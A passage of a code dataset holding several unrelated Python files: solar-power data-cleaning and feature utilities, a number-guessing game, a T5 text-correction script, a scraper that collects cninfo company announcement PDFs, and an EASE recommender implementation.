prev_val = None\n consecutive_count = 0\n y_with_indexes_to_drop = df.copy()\n\n for i, val in enumerate(df[\"pv_measurement\"]):\n if val != 0:\n if val == prev_val:\n consecutive_count += 1\n else:\n prev_val = val\n consecutive_count = 0\n\n if consecutive_count >= 1:\n indexes_to_drop.add(i - consecutive_count) # Add to set to ensure uniqueness\n indexes_to_drop.add(i) # Add to set to ensure uniqueness\n \n # Convert the set to a sorted list to use for indexing\n indexes_to_drop = sorted(indexes_to_drop)\n \n # Create the DataFrame without the dropped indices\n df_without_dropped = df.drop(indexes_to_drop)\n \n # Create the DataFrame with only the dropped indices\n df_with_only_dropped = df.loc[indexes_to_drop]\n\n return df_without_dropped, df_with_only_dropped\n\n\ndef delete_ranges_of_zeros_and_interrupting_values_and_return_y_with_dropped_indices(df, number_of_recurring_zeros, interrupting_values=[]):\n count = 0\n drop_indices = []\n\n # Store the original DataFrame to reinsert NaN values later\n original_df = df.copy()\n\n # Get the indices of the NaN values\n nan_indices = df[df['pv_measurement'].isna()].index.tolist()\n if len(nan_indices) > 0:\n print(\"penis\")\n # Drop the NaN values for processing zeros and interrupting values\n df = df.dropna()\n\n for index, row in df.iterrows():\n if row[\"pv_measurement\"] == 0 or row[\"pv_measurement\"] in interrupting_values:\n count += 1\n else:\n if count > number_of_recurring_zeros:\n 
drop_indices.extend(df.index[index - count:index])\n count = 0\n\n if count > number_of_recurring_zeros:\n drop_indices.extend(df.index[index - count + 1:index + 1])\n \n # Convert the set to a sorted list to use for indexing\n indexes_to_drop = sorted(drop_indices)\n \n # Create the DataFrame without the dropped indices\n df_without_dropped = df.drop(indexes_to_drop)\n \n # Combine drop_indices with nan_indices to get all indices to be dropped\n all_drop_indices = sorted(set(drop_indices + nan_indices))\n\n # Create the DataFrame with only the dropped indices\n df_with_only_dropped = original_df.loc[all_drop_indices]\n \n return df_without_dropped, df_with_only_dropped #, df_with_only_dropped (uncomment if needed)\n\ndef drop_long_sequences_and_return_y_with_dropped_indices(df, x):\n indexes_to_drop = []\n zero_count = 0\n\n for i, val in enumerate(df['pv_measurement']):\n if val == 0:\n zero_count += 1\n else:\n if zero_count >= x:\n start_index = i - zero_count\n end_index = i - 1 # inclusive\n if start_index >= 0 and end_index < len(df):\n indexes_to_drop.extend(list(range(start_index, end_index + 1)))\n zero_count = 0\n\n # In case the sequence ends with zeros, this will handle it\n if zero_count >= x:\n start_index = len(df) - zero_count\n end_index = len(df) - 1\n if start_index >= 0 and end_index < len(df):\n indexes_to_drop.extend(list(range(start_index, end_index + 1)))\n\n # Create a dataframe with only the dropped rows\n df_with_only_dropped = df.loc[df.index[indexes_to_drop]].copy()\n\n # Drop the rows from the original dataframe\n df_dropped = df.drop(df.index[indexes_to_drop])\n \n return df_dropped, df_with_only_dropped\n\n#gustav sitt\ndef agumenting_time(df):\n df[\"new_time\"] = pd.to_datetime(df['date_forecast'])\n df['hour'] = df['new_time'].dt.hour\n df['minute'] = df['new_time'].dt.minute\n #df[\"day\"] = df['new_time'].dt.day\n df[\"month\"] = df['new_time'].dt.month\n df['time_decimal'] = df['hour'] + df['minute'] / 60.0\n phase_adjustment = (np.pi/2) - 11 * (2 * np.pi / 24)\n df['hour_sin'] = np.sin(df['time_decimal'] * (2. * np.pi / 24) + phase_adjustment)\n df['hour_cos'] = np.cos(df['time_decimal'] * (2. 
* np.pi / 24) + phase_adjustment)\n df = df.drop(columns = [\"new_time\"])\n return df\n\ndef direct_rad_div_diffuse_rad(df):\n df['dif_dat_rad'] = 0.0\n condition = df['diffuse_rad:W'] != 0\n df.loc[condition, 'dif_dat_rad'] = df.loc[condition, 'direct_rad:W'] / df.loc[condition, 'diffuse_rad:W']\n return df\n\ndef get_hyperparameters_for_rf(x_observed, x_estimated, y, selected_features ):\n X_train = pd.concat([clean_df(x_observed, selected_features), clean_df(x_estimated, selected_features)])\n X_train, y_train = resize_training_data(X_train,y)\n # Define the parameter grid\n param_grid = {\n 'n_estimators': [50, 100, 200],\n 'max_depth': [None, 10, 20, 30],\n 'min_samples_split': [2, 5, 10],\n 'min_samples_leaf': [1, 2, 4]\n }\n\n # Create a Random Forest Regressor\n rf = RandomForestRegressor(random_state=42)\n\n # Create the scorer\n scorer = make_scorer(mean_absolute_error, greater_is_better=False)\n\n # Create the grid search\n grid_search = GridSearchCV(estimator=rf, param_grid=param_grid, scoring=scorer, cv=5)\n\n # Fit the grid search\n grid_search.fit(X_train, y_train[\"pv_measurement\"])\n\n # Get the best parameters\n best_params = grid_search.best_params_\n print(f\"Best parameters b: {best_params}\")\n return best_params\n\n#gammelt under\n\n\ndef date_forecast_to_time(df):\n df['month'] = df['date_forecast'].dt.month\n df['hour'] = df['date_forecast'].dt.hour\n df['day'] = df['date_forecast'].dt.day\n \n df['hour_sin'] = np.sin(df['hour'] * (2. * np.pi / 24))\n df['hour_cos'] = np.cos(df['hour'] * (2. * np.pi / 24))\n df['month_sin'] = np.sin((df['month']-1) * (2. * np.pi / 12))\n df['month_cos'] = np.cos((df['month']-1) * (2. * np.pi / 12))\n return df\n \n#Scales all the feature value in a way they take a simmilar range\ndef scale_df(df, fit):\n if fit:\n scaled_array = scaler.fit_transform(df)\n else:\n scaled_array = scaler.transform(df)\n \n # Convert the scaled array back into a pandas DataFrame\n scaled_df = pd.DataFrame(scaled_array, index=df.index, columns=df.columns)\n return scaled_df\n\n#Removes all features from a df except selected_features\ndef clean_df(df, selected_features):\n return df[selected_features]\n\n#Function which resizes the training data such that only the rows with the same date and time for weather is kept.\n#X_train is either observed or forcasted weather and y_train is how much energy is produced. \n#y_features are a list containing the column names of y_train\n#X_date_feature is the feature name which the date and time for the weather is savew. 
This will probably always be \"date_forecast\" and may be changed\ndef resize_training_data(X_train, y_train):\n y_features = y_train.columns.tolist()\n X_date_feature = \"date_forecast\"\n \n merged = pd.merge(X_train, y_train,left_on=X_date_feature, right_on='time', how='inner')\n y_train_resized = merged[y_features]\n columns_to_drop = y_features + [X_date_feature]\n X_train_resized = merged.drop(columns = columns_to_drop)\n return X_train_resized, y_train_resized\n \n#Splits the training data such that it is training set is observed and some estimated, valid is some estimated and test is some estimated\ndef training_data_split(X_observed_clean, X_estimated_clean_mean):\n X_train_estimated = X_estimated_clean_mean[:int(X_estimated_clean_mean.shape[0] * 3 / 4)]\n X_valid = X_estimated_clean_mean[int(X_estimated_clean_mean.shape[0] * 3 / 4):int(X_estimated_clean_mean.shape[0] * 9 / 10)]\n X_test = X_estimated_clean_mean[int(X_estimated_clean_mean.shape[0] * 9 / 10):]\n \n X_train = pd.concat([X_observed_clean, X_train_estimated])\n return X_train, X_valid, X_test\n \n#A function which takes the mean out of every 4th column and saves it on the time on the time of the 4th. Makes it so it is every hour.\n#TODO: Should be swapped for Gustavs code!\ndef mean_df(df):\n # Assuming df is your DataFrame and 'date_forecast' is your date column\n # Making a copy of the DataFrame to avoid modifying the original data\n df_copy = df.copy()\n \n # Step 1: Keeping every 4th row in the date column\n date_column = df_copy['date_forecast'].iloc[::4]\n \n #Made it such that all the intresting columns having data for 1 hour average back in time is saved such for the last hour. Ex diffuse_rad_1h:j cl. 23:00 is used for the weather prediction 22:00\n selected_col = ['diffuse_rad_1h:J', 'direct_rad_1h:J', 'clear_sky_energy_1h:J']\n selected_values = df_copy[selected_col].iloc[4::4].reset_index(drop=True)\n last_row = pd.DataFrame(df_copy[selected_col].iloc[-1]).T.reset_index(drop=True)\n selected_values = pd.concat([selected_values, last_row], ignore_index=True)\n \n # Step 2: Creating a grouping key\n grouping_key = np.floor(np.arange(len(df_copy)) / 4)\n \n # Step 3: Group by the key and calculate the mean, excluding the date column\n averaged_data = df_copy.drop(columns=['date_forecast']).groupby(grouping_key).mean()\n # Step 4: Reset index and merge the date column\n averaged_data.reset_index(drop=True, inplace=True)\n averaged_data['date_forecast'] = date_column.values\n averaged_data[selected_col] = selected_values.values\n return averaged_data\n\n#Saves the predictions in proper format, y_pred needs to contain predicitions for all 3 locatoins\n\ndef submission(filename, y_pred, path_to_src):\n test = pd.read_csv(path_to_src + '/Data/CSV/test.csv')\n submission = pd.read_csv(path_to_src + '/Data/CSV/sample_submission.csv')\n test['prediction'] = y_pred\n submission = submission[['id']].merge(test[['id', 'prediction']], on='id', how='left')\n submission.to_csv(path_to_src + \"/Data/CSV/\" + filename, index=False)\n\ndef drop_repeating_sequences(df):\n indexes_to_drop = []\n prev_val = None\n consecutive_count = 0\n\n for i, val in enumerate(df[\"pv_measurement\"]):\n if val != 0:\n if val == prev_val:\n consecutive_count += 1\n else:\n prev_val = val\n consecutive_count = 0\n\n if consecutive_count >= 1:\n indexes_to_drop.extend([i - consecutive_count, i])\n\n return df.drop(indexes_to_drop)\n\ndef delete_ranges_of_zeros_and_interrupting_values(df, number_of_recurring_zeros, interrupting_values = []):\n 
count = 0\n drop_indices = []\n\n df = df.dropna()\n\n for index, row in df.iterrows():\n if row[\"pv_measurement\"] == 0 or row[\"pv_measurement\"] in interrupting_values:\n count += 1\n else:\n if count > number_of_recurring_zeros:\n drop_indices.extend(df.index[index - count:index])\n count = 0\n\n if count > number_of_recurring_zeros:\n drop_indices.extend(df.index[index - count + 1:index + 1])\n\n df.drop(drop_indices, inplace=True)\n\n return df\n\ndef drop_long_sequences(df, x):\n indexes_to_drop = []\n zero_count = 0\n\n for i, val in enumerate(df['pv_measurement']):\n if val == 0:\n zero_count += 1\n else:\n if zero_count >= x:\n start_index = i - zero_count\n end_index = i - 1 # inclusive\n if start_index >= 0 and end_index < len(df):\n indexes_to_drop.extend(list(range(start_index, end_index + 1)))\n zero_count = 0\n\n # In case the sequence ends with zeros, this will handle it\n if zero_count >= x:\n start_index = len(df) - zero_count\n end_index = len(df) - 1\n if start_index >= 0 and end_index < len(df):\n indexes_to_drop.extend(list(range(start_index, end_index + 1)))\n\n return df.drop(df.index[indexes_to_drop])\n\ndef clean_mean_combine(X_observed, X_estimated, selected_features):\n X_observed_clean = clean_df(X_observed, selected_features)\n X_estimated_clean = clean_df(X_estimated, selected_features)\n X_estimated_clean_mean = mean_df(X_estimated_clean)\n X_observed_clean_mean = mean_df(X_observed_clean)\n X_train = pd.concat([X_observed_clean_mean, X_estimated_clean_mean])\n return X_train\n\ndef prepare_X(X_observed, X_estimated, selected_features, wanted_months):\n X_observed = subset_months(X_observed.copy(), wanted_months)\n X_train = clean_mean_combine(X_observed, X_estimated, selected_features)\n X_train = add_lag_and_lead_features(X_train, 1, ['direct_plus_diffuse', 'direct_plus_diffuse_1h'])\n return X_train\n\ndef prepare_testdata_rf_a(X_test, selected_features):\n X_test = clean_df(X_test, selected_features)\n X_test = mean_df(X_test)\n X_test = add_lag_and_lead_features(X_test, 1, ['direct_plus_diffuse', 'direct_plus_diffuse_1h'])\n X_test = X_test.drop(columns = [\"date_forecast\"])\n return X_test\n\ndef add_all_features(df):\n df = direct_rad_div_diffuse_rad(df)\n df = agumenting_time(df)\n df[\"direct_plus_diffuse\"] = df[\"direct_rad:W\"] + df[\"diffuse_rad:W\"]\n df[\"direct_plus_diffuse_1h\"] = df[\"direct_rad_1h:J\"] + df[\"diffuse_rad_1h:J\"]\n return df\n\ndef subset_months(df, wanted_months):\n df[\"month\"] = df['date_forecast'].dt.month\n df_subset = df[df[\"month\"].isin(wanted_months)]\n return df_subset\n\ndef remove_all_predicted_values_during_given_time_frame(X_test_c, x_pred, hours_to_zero_out_b):\n new_df = pd.DataFrame({\n \"date_forecast\": X_test_c[\"date_forecast\"].iloc[::4].reset_index(drop=True),\n \"pv_measurement\": x_pred # Assuming x_pred is the correct variable here\n })\n\n # Convert 'date_forecast' to datetime and extract hour and month\n new_df[\"new_time\"] = pd.to_datetime(new_df['date_forecast'])\n new_df['hour'] = new_df['new_time'].dt.hour\n new_df[\"month\"] = new_df['new_time'].dt.month\n \n hourly_sum = new_df.groupby('hour')['pv_measurement'].sum()\n \"\"\"\n # Iterate through each hour and print the total sum of 'pv_measurements'\n print(\"before augmentation\")\n for hour, sum_pv in hourly_sum.items():\n print(f\"Hour {hour}: Total PV Measurements = {sum_pv}\")\n \"\"\" \n # Update pv_measurements to 0 based on the month-hour mapping\n for month, hours in hours_to_zero_out_b.items():\n new_df.loc[(new_df['month'] 
== month) & (new_df['hour'].isin(hours)), 'pv_measurement'] = 0\n \n #print_zeros(new_df)\n augmented_pv_measurements = new_df['pv_measurement']\n\n # Convert to array if needed\n augmented_pv_measurements_array = augmented_pv_measurements.to_numpy()\n return augmented_pv_measurements_array\n\ndef add_lag_and_lead_features(df, lag_steps=1, columns = []):\n # Create a new DataFrame to hold the lagged and lead features\n lagged_df = pd.DataFrame()\n\n # Make sure the 'date' column is a datetime type\n df['date_forecast'] = pd.to_datetime(df['date_forecast'])\n\n # Group by date to ensure continuity within each day\n grouped = df.groupby(df['date_forecast'].dt.date)\n\n for _, group in grouped:\n # Reset index to allow proper shifting within group\n group = group.reset_index(drop=True)\n\n # Copy the current group to avoid modifying the original data\n temp_group = group.copy()\n\n # Iterate over all columns to create lagged and lead versions\n for column in columns:\n # Skip the date column if it exists\n if column == 'date' or column == 'date_forecast':\n continue\n\n # Create lagged feature for previous values\n lagged_column_name = f\"{column}_lag{lag_steps}\"\n temp_group[lagged_column_name] = group[column].shift(lag_steps).fillna(group[column])\n\n # Create lead feature for future values\n lead_column_name = f\"{column}_lead{lag_steps}\"\n temp_group[lead_column_name] = group[column].shift(-lag_steps).fillna(group[column])\n\n # Create a column for the difference between the lagged value and the present value (lag -1 - present)\n diff_lag_column_name = f\"{column}_diff_lag{lag_steps}\"\n temp_group[diff_lag_column_name] = temp_group[lagged_column_name] - group[column]\n\n # Create a column for the difference between the lead value and the present value (lag +1 - present)\n #diff_lead_column_name = f\"{column}_diff_lead{lag_steps}\"\n #temp_group[diff_lead_column_name] = temp_group[lead_column_name] - group[column]\n\n # Append the processed group to the lagged_df\n lagged_df = pd.concat([lagged_df, temp_group], axis=0)\n\n # Reset the index of the resulting DataFrame\n lagged_df = lagged_df.reset_index(drop=True)\n\n return lagged_df\n","repo_name":"yadert/TDT4173-ML-task","sub_path":"src/Models/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":18692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
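The `date_forecast_to_time` helper in the record above encodes hour and month as sine/cosine pairs so that 23:00 sits next to 00:00 and December next to January. A minimal, self-contained sketch of that encoding on synthetic data (the timestamps are made up; the column names follow the snippet above):

```python
import numpy as np
import pandas as pd

# Synthetic hourly timestamps standing in for the 'date_forecast' column.
df = pd.DataFrame({"date_forecast": pd.date_range("2023-01-01", periods=48, freq="h")})
df["hour"] = df["date_forecast"].dt.hour
df["month"] = df["date_forecast"].dt.month
# Map hour 0..23 onto the unit circle so hour 23 and hour 0 end up adjacent.
df["hour_sin"] = np.sin(df["hour"] * (2.0 * np.pi / 24))
df["hour_cos"] = np.cos(df["hour"] * (2.0 * np.pi / 24))
df["month_sin"] = np.sin((df["month"] - 1) * (2.0 * np.pi / 12))
df["month_cos"] = np.cos((df["month"] - 1) * (2.0 * np.pi / 12))
print(df[["hour", "hour_sin", "hour_cos"]].head())
```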
+{"seq_id":"18639653551","text":"# Number Guessing Game Objectives:\n\n# Include an ASCII art logo.\n# Allow the player to submit a guess for a number between 1 and 100.\n# Check user's guess against actual answer. Print \"Too high.\" or \"Too low.\" depending on the user's answer.\n# If they got the answer correct, show the actual answer to the player.\n# Track the number of turns remaining.\n# If they run out of turns, provide feedback to the player.\n# Include two different difficulty levels (e.g., 10 guesses in easy mode, only 5 guesses in hard mode).\nimport random\n\nfrom numpy import number\n\n\ndef printNumberOfAttemp(number_of_guess):\n print(f\"You have {number_of_guess} attemps remaining to guess the number.\")\n\n\ndef isHigherOrLower(user_input, chosen_number, number_of_guess):\n if(user_input < chosen_number):\n print(\"Too Low\")\n number_of_guess -= 1\n return number_of_guess\n elif(user_input > chosen_number):\n print(\"Too High\")\n number_of_guess -= 1\n return number_of_guess\n else:\n print(\"This is the correct answer\")\n print(f\"The chosen number is {chosen_number}\")\n number_of_guess = 0\n return number_of_guess\n\n\ndef revealAnswer(chosen_number):\n print(f\"The chosen number is {chosen_number}\")\n\n\nnumber_of_guess = 0\nprint(\"Welcome to the Number Guessing Game!\")\nchosen_number = random.randint(1, 100)\nprint(\"I'm thinking of a number between 1 and 100.\")\ndifficulty = input(\"Choose a difficulty. Type 'easy' or 'hard': \").lower()\n\nif(difficulty == \"easy\"):\n number_of_guess = 10\nelse:\n number_of_guess = 5\n\nwhile(number_of_guess > 0):\n printNumberOfAttemp(number_of_guess)\n user_guess = int(input(\"Make a guess: \"))\n number_of_guess = isHigherOrLower(\n user_guess, chosen_number, number_of_guess)\n\nrevealAnswer(chosen_number)\n","repo_name":"supawichza40/100DaysCoding-Python","sub_path":"day_12/final_project-number_guessing_game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"43626159636","text":"import torch\nfrom transformers import T5Tokenizer, T5ForConditionalGeneration\n\ndef correct_text(model, tokenizer, input_text, max_length=512):\n input_ids = tokenizer(input_text, return_tensors=\"pt\", max_length=max_length, truncation=True).input_ids\n input_ids = input_ids.to(device)\n output_ids = model.generate(input_ids, num_beams=50, temperature=10.0, output_scores=True)\n print(output_ids)\n corrected_text = tokenizer.decode(output_ids[0][3:], skip_special_tokens=True)\n return corrected_text\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nmodel = T5ForConditionalGeneration.from_pretrained(\"./trained_model\").to(device)\ntokenizer = T5Tokenizer.from_pretrained(\"./trained_model\", model_max_length=512)\n\n# Asegurarse de que el modelo esté en modo de evaluación\nmodel.eval()\n\n# Si está utilizando una GPU, mover el modelo a la GPU\nif torch.cuda.is_available():\n model.cuda()\n\n# Ejemplo de uso de la función correct_text\ninput_text = \"\"\n\ncorrected_text = correct_text(model, tokenizer, input_text)\nprint(f\"Texto original: {input_text}\")\nprint(f\"Texto corregido: {corrected_text}\")\n\n","repo_name":"Rodrigo9721/mbart_finetuning_for_text_correction","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39612012521","text":"import time\nfrom kits import reFormat \nfrom kits.reFormat import myTime\nimport kits.normRequests as requests\nfrom kits.asyncRequests import async_gets_jsons,async_downloads\nfrom kits.parsePdf import parse_pdf_mp\nfrom kits.multi_process import multi_process_star\nfrom kits import quickDb\nimport config\nfrom config import query_config\nQUERY_DICT = query_config.query_dict\n\nTABLE_INFO = {\n 'secCode':'VARCHAR(20) NOT NULL',\n 'secName':'VARCHAR(30) NOT NULL',\n 'orgId':'VARCHAR(50)',\n 'type':'VARCHAR(20)',\n 'announcementId':'VARCHAR(30) NOT NULL',\n 'announcementTitle':'VARCHAR(100) NOT NULL',\n 'announcement_title':'VARCHAR(100) NOT NULL',\n 'announcementTime':'BIGINT UNSIGNED',\n 'announcement_year':'YEAR', # 实际时间如'2018'\n 'adjunctUrl':'VARCHAR(100) NOT NULL',\n 'record_time':'DATE', # 记录日期\n 'pages_num':'INT UNSIGNED',\n 'words_num':'BIGINT UNSIGNED'\n}\nTABLE_PRIMARY = 'announcementId'\n\n\n\ndef get_json_from_juchao(search_dict):\n\n for key,value in search_dict.items():\n if type(value) == list:\n multi_key = key\n values_list = value\n search_dict[multi_key] = f\"\"\"{{{multi_key}}}\"\"\"\n mode = \"coroutine\"\n break\n else:\n mode = \"singal\" \n # 获取url\n url = 'http://www.cninfo.com.cn/new/fulltextSearch/full?searchkey={searchkey}'\\\n '&sdate={sdate}'\\\n '&edate={edate}'\\\n '&isfulltext={isfulltext}'\\\n '&sortName={sortName}'\\\n '&sortType={sortType}'\\\n '&pageNum={pageNum}&type={type}'.format(**search_dict)\n if mode == \"singal\":\n response = requests.get(url,)\n res = response.json()\n elif mode == \"coroutine\":\n urls = [url.format(**{multi_key:value}) for value in values_list]\n res = async_gets_jsons(urls)\n return res\n \n\ndef get_num_pages_from_json(json_dict):\n import math\n return math.ceil(json_dict['totalAnnouncement']/10)\n\n\ndef query_all_dicts(param_dict):\n \"\"\"\n 返回所有查询结果(字典列表)\n \"\"\"\n # 该字典为查询条件,值为None的表明可被param_dict更新,但请勿更改关键字key\n Fix_query_dict = {\n # 搜索的关键词,如【'企业社会责任'】\n 'searchkey':None,\n # 发布起始时间,如【'2023-01-04'】【''表示不进行限制 】 \n 'sdate':None, \n # 发布截止时间,如【'2023-02-24'】【''表示不进行限制 】\n 'edate':None, \n # 是否进行全文搜索,【'false'为只搜索标题,'true'为搜索全文 】\n 'isfulltext':None, \n # 按什么进行排序,【'pubdate'为按时间排序,'stockcode_cat'为按代码排序,'nothing'为按相关度排序 】\n 'sortName':'stockcode_cat', \n # 升序还是降序,【'asc'为升序,'desc'为降序 】\n 'sortType':'asc', \n # 页码,【如'1'】\n 'pageNum':'1', \n # 板块筛选,【''为全部板块,'shj'为深沪京,'s'为三板... 
】\n 'type':None, \n }\n Fix_query_dict.update(param_dict)\n json_res = get_json_from_juchao(search_dict=Fix_query_dict)\n num_pages = get_num_pages_from_json(json_res)\n Fix_query_dict['pageNum'] = [i+1 for i in range(num_pages)]\n json_of_pages = get_json_from_juchao(search_dict=Fix_query_dict)\n \n dicts_list = []\n for json_of_page in json_of_pages:\n announcements_list = json_of_page['announcements']\n dicts_list += announcements_list\n \n [dict_.update({'type':Fix_query_dict['type']}) for dict_ in dicts_list]\n return dicts_list\n \n\ndef reformat_dict(an_dict):\n \"\"\"用于格式化字典:会将格式化后的关键字作为dataframe的columns\n \"\"\"\n # {'id': None, 'secCode': '000039', 'secName': '中集集团', \n # 'orgId': 'gssz0000039', 'announcementId': '1204526484', \n # 'announcementTitle': '中集集团:2017年社会责任暨环境、社会及管治报告', \n # 'announcementTime': 1522166400000, 'adjunctUrl': 'finalpage/2018-03-28/1204526484.PDF', \n # 'adjunctSize': 2190, 'adjunctType': 'PDF', 'storageTime': None, \n # 'columnId': '09020202||250101||251302', 'pageColumn': 'SZZB', \n # 'announcementType': '01010503||010112||01239999', 'associateAnnouncement': None, \n # 'important': None, 'batchNum': None, 'announcementContent': None, 'orgName': None, \n # 'announcementTypeName': None}\n\n # 关系到columns的一致性,请谨慎更改该字典\n res_dict = {\n 'secCode':an_dict['secCode'],\n 'secName':an_dict['secName'],\n 'orgId':an_dict['orgId'],\n 'type':an_dict['type'],\n 'announcementId':an_dict['announcementId'],\n 'announcementTitle':an_dict['announcementTitle'],\n 'announcement_title':reFormat.remove_em(an_dict['announcementTitle']),\n 'announcementTime':an_dict['announcementTime'],\n 'announcement_year':myTime(an_dict['announcementTime']/1000).year, # 实际时间如'2018'\n 'adjunctUrl':an_dict['adjunctUrl'],\n 'record_time':myTime(time.time()).date, # 记录日期\n }\n l = len(res_dict.keys())\n # 确保写入的一致性\n assert list(res_dict.keys()) == list(TABLE_INFO.keys())[:l]\n # print(remove_em(an_dict['announcementTitle']))\n return res_dict\n\n\ndef filter_dicts(res_dicts,reject_list):\n res_dicts = [res_dict for res_dict in res_dicts \n if reFormat.maintain_or_not(res_dict['announcement_title'],reject_list=reject_list)]\n return res_dicts\n\n\ndef download_from_dicts(res_dicts,to_dir):\n \"\"\"将传入的res_dicts中的每一项提取其中的pdf链接进行下载,返回下载完成后对应的文件路径(列表)\"\"\"\n pdf_urls = [(dict0['announcement_title']+'.pdf','http://static.cninfo.com.cn/'+dict0['adjunctUrl']) for dict0 in res_dicts]\n # 使用协程下载pdf文件,并返回所有文件下载到的路径(类型:tuple)\n dirs = async_downloads(pdf_urls,to_dir)\n return dirs\n\n\nif __name__=='__main__':\n\n db = quickDb.MyDb()\n db.close()\n\n TABLE_NAME_search = QUERY_DICT['searchkey']\n # 返回搜索结果(字典列表)\n dicts = query_all_dicts(param_dict=QUERY_DICT)\n # 格式化搜索结果→将存入csv/数据库的格式\n res_dicts = [reformat_dict(announcement) for announcement in dicts]\n # 筛掉一部分含某些关键词的,如\"英文版\"\n res_dicts = filter_dicts(res_dicts,reject_list=['英文版',])\n # 对传入的res_dicts进行裁剪(可用于分布式)\n print(f\"满足条件的共有:【 {len(res_dicts)}条 】\")\n l,r = reFormat.extra_range(input(\"\"\"请选择处理的范围,如:\n 【 0,3 】表示从第0条开始到第2条(左闭右开),\n 【 3, 】表示从3开始到最后一个,\n 【 ,-1 】表示从第0个到倒数第2个\n \"\"\"))\n res_dicts = res_dicts[l:r]\n # 赋值SEARCH_RES_NAME作为保存此次分析结果的id,形如\"社会及管治___false_shj_0_10\"\n\n # 生成所有announcement的pdf文件的名称和下载列表,将用协程下载\n #SEARCH_RES_NAME = f\"{'_'.join(QUERY_DICT.values())}_{l}_{r}\"\n SEARCH_RES_NAME = f\"{'_'.join(QUERY_DICT.values())}\"\n dirs = download_from_dicts(res_dicts,f'./data/search_res/{SEARCH_RES_NAME}')\n\n # multiprocess\n import multiprocessing\n\n # 使用多进程分析pdf列表,返回结果字典列表(每个字典对应一个pdf的分析结果)\n value = 
multiprocessing.Manager().Value('i',0)\n lock = multiprocessing.Manager().Lock()\n total_num = len(dirs)\n args_list = list(zip(dirs,[value]*total_num,[total_num]*total_num,[lock]*total_num))\n parse_res = multi_process_star(parse_pdf_mp,args_list)\n # 用pdf列表的分析结果更新res_dicts\n [res_dict.update(pdf_res_dict) for pdf_res_dict,res_dict in zip(parse_res,res_dicts)]\n\n # 确保写入的一致性\n assert list(res_dicts[0].keys()) == list(TABLE_INFO.keys())\n\n\n db = quickDb.MyDb('Juchao')\n db.execute(quickDb.generate_create_sql(table_name=TABLE_NAME_search,columns_infos_dict=TABLE_INFO,primary_key=TABLE_PRIMARY))\n # 写入announcements结果\n db.execute(quickDb.generate_insert_sql(table_name=TABLE_NAME_search,input_args=res_dicts))\n db.commit()\n db.close()\n\n","repo_name":"Arcsincode/parse_code","sub_path":"search_main.py","file_name":"search_main.py","file_ext":"py","file_size_in_byte":8251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
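The cninfo endpoint queried above returns 10 announcements per page, so `get_num_pages_from_json` reduces to a ceiling division. A standalone check of that arithmetic:

```python
import math

def num_pages(total_announcements: int, per_page: int = 10) -> int:
    # One extra partial page whenever the total is not a multiple of per_page.
    return math.ceil(total_announcements / per_page)

assert num_pages(0) == 0
assert num_pages(10) == 1
assert num_pages(11) == 2
```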
+{"seq_id":"75058174802","text":"from scipy.sparse import csr_matrix\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nfrom multiprocessing import Pool, cpu_count\n\n\nclass EASE:\n def __init__(self):\n self.user_enc = LabelEncoder()\n self.item_enc = LabelEncoder()\n\n def _get_users_and_items(self, df):\n users = self.user_enc.fit_transform(df.loc[:, 'user_id'])\n items = self.item_enc.fit_transform(df.loc[:, 'item_id'])\n return users, items\n\n def fit(self, df, lambda_: float = 0.5, implicit=True):\n \"\"\"\n df: pandas.DataFrame with columns user_id, item_id and (rating)\n lambda_: l2-regularization term\n implicit: if True, ratings are ignored and taken as 1, else normalized ratings are used\n \"\"\"\n users, items = self._get_users_and_items(df)\n values = (\n np.ones(df.shape[0])\n if implicit\n else df['rating'].to_numpy() / df['rating'].max()\n )\n\n X = csr_matrix((values, (users, items)))\n self.X = X\n\n G = X.T.dot(X).toarray()\n diagIndices = np.diag_indices(G.shape[0])\n G[diagIndices] += lambda_\n P = np.linalg.inv(G)\n B = P / (-np.diag(P))\n B[diagIndices] = 0\n\n self.B = B\n self.pred = X.dot(B)\n\n def predict(self, train, users, items, k):\n items = self.item_enc.transform(items)\n dd = train.loc[train.user_id.isin(users)]\n dd['ci'] = self.item_enc.transform(dd.item_id)\n dd['cu'] = self.user_enc.transform(dd.user_id)\n g = dd.groupby('cu')\n with Pool(cpu_count()) as p:\n user_preds = p.starmap(\n self.predict_for_user,\n [(user, group, self.pred[user, :], items, k) for user, group in g],\n )\n df = pd.concat(user_preds)\n df['item_id'] = self.item_enc.inverse_transform(df['item_id'])\n df['user_id'] = self.user_enc.inverse_transform(df['user_id'])\n return df\n\n @staticmethod\n def predict_for_user(user, group, pred, items, k):\n watched = set(group['ci'])\n candidates = [item for item in items if item not in watched]\n pred = np.take(pred, candidates)\n res = np.argpartition(pred, -k)[-k:]\n r = pd.DataFrame(\n {\n \"user_id\": [user] * len(res),\n \"item_id\": np.take(candidates, res),\n \"score\": np.take(pred, res),\n }\n ).sort_values('score', ascending=False)\n return r\n","repo_name":"Darel13712/ease_rec","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"3"}
